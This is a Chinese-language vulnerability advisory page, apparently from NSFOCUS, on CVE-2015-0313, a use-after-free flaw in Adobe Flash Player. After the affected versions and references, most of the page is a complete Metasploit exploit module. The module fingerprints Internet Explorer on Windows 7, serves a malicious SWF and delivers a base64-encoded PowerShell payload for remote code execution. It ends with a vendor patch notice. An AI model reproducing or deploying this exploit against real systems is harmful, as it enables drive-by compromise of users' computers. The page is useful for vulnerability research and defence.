安全研究
安全漏洞
Adobe Flash Player远程代码执行漏洞(CVE-2015-0313)
发布日期:2015-02-02
更新日期:2015-02-03
受影响系统:
Adobe Flash Player < 13.0.0.264描述:
Adobe Flash Player 16.x
Adobe Flash Player 15.x
Adobe Flash Player 14.x
BUGTRAQ ID: 72429
CVE(CAN) ID: CVE-2015-0313
Adobe Flash Player是一个集成的多媒体播放器。
Adobe Flash Player 13.0.0.264、14.x, 15.x, 16.0.0.296之前版本(Windows及OS X),11.2.202.440(Linux)存在安全漏洞,远程攻击者可利用此漏洞执行任意代码。
<*来源:Elia Florio (elia_florio@symantec.com)
Dave Weston
链接:http://secunia.com/advisories/62528/
https://helpx.adobe.com/security/products/flash-player/apsa15-02.html
*>
测试方法:
警 告
以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote
Rank = NormalRanking
include Msf::Exploit::Powershell
include Msf::Exploit::Remote::BrowserExploitServer
def initialize(info={})
super(update_info(info,
'Name' => 'Adobe Flash Player ByteArray With Workers Use After Free',
'Description' => %q{
This module exploits an use after free vulnerability in Adobe Flash Player. The
vulnerability occurs when the ByteArray assigned to the current ApplicationDomain
is freed from an ActionScript worker, who can fill the memory and notify the main
thread to corrupt the new contents. This module has been tested successfully on
Windows 7 SP1 (32 bits), IE 8 to IE 11 and Flash 16.0.0.296.
},
'License' => MSF_LICENSE,
'Author' =>
[
'Unknown', # Vulnerability discovery and exploit in the wild
'hdarwin', # Public exploit by @hdarwin89 (all the magic)
'juan vazquez' # msf module
],
'References' =>
[
['CVE', '2015-0313'],
['URL', 'https://helpx.adobe.com/security/products/flash-player/apsa15-02.html'],
['URL', 'http://hacklab.kr/flash-cve-2015-0313-%EB%B6%84%EC%84%9D/'],
['URL', 'http://blog.trendmicro.com/trendlabs-security-intelligence/analyzing-cve-2015-0313-the-new-flash-player-zero-day/']
],
'Payload' =>
{
'DisableNops' => true
},
'Platform' => 'win',
'BrowserRequirements' =>
{
:source => /script|headers/i,
:os_name => OperatingSystems::Match::WINDOWS_7,
:ua_name => Msf::HttpClients::IE,
:flash => lambda { |ver| ver =~ /^16\./ && ver == '16.0.0.296' },
:arch => ARCH_X86
},
'Targets' =>
[
[ 'Automatic', {} ]
],
'Privileged' => false,
'DisclosureDate' => 'Feb 02 2015',
'DefaultTarget' => 0))
end
def exploit
@swf = create_swf
super
end
def on_request_exploit(cli, request, target_info)
print_status("Request: #{request.uri}")
if request.uri =~ /\.swf$/
print_status('Sending SWF...')
send_response(cli, @swf, {'Content-Type'=>'application/x-shockwave-flash', 'Cache-Control' => 'no-cache, no-store', 'Pragma' => 'no-cache'})
return
end
print_status('Sending HTML...')
send_exploit_html(cli, exploit_template(cli, target_info), {'Pragma' => 'no-cache'})
end
def exploit_template(cli, target_info)
swf_random = "#{rand_text_alpha(4 + rand(3))}.swf"
target_payload = get_payload(cli, target_info)
psh_payload = cmd_psh_payload(target_payload, 'x86', {remove_comspec: true})
b64_payload = Rex::Text.encode_base64(psh_payload)
html_template = %Q|<html>
<body>
<object classid="clsid:d27cdb6e-ae6d-11cf-96b8-444553540000" codebase="http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab" width="1" height="1" />
<param name="movie" value="<%=swf_random%>" />
<param name="allowScriptAccess" value="always" />
<param name="FlashVars" value="sh=<%=b64_payload%>" />
<param name="Play" value="true" />
<embed type="application/x-shockwave-flash" width="1" height="1" src="<%=swf_random%>" allowScriptAccess="always" FlashVars="sh=<%=b64_payload%>" Play="true"/>
</object>
</body>
</html>
|
return html_template, binding()
end
def create_swf
path = ::File.join(Msf::Config.data_directory, 'exploits', 'CVE-2015-0313', 'msf.swf')
swf = ::File.open(path, 'rb') { |f| swf = f.read }
swf
end
end
建议:
厂商补丁:
Adobe
-----
Adobe已经为此发布了一个安全公告(apsa15-02)以及相应补丁:
apsa15-02:Security Advisory for Adobe Flash Player
链接:https://helpx.adobe.com/security/products/flash-player/apsa15-02.html
浏览次数:1904
严重程度:0(网友投票)
绿盟科技给您安全的保障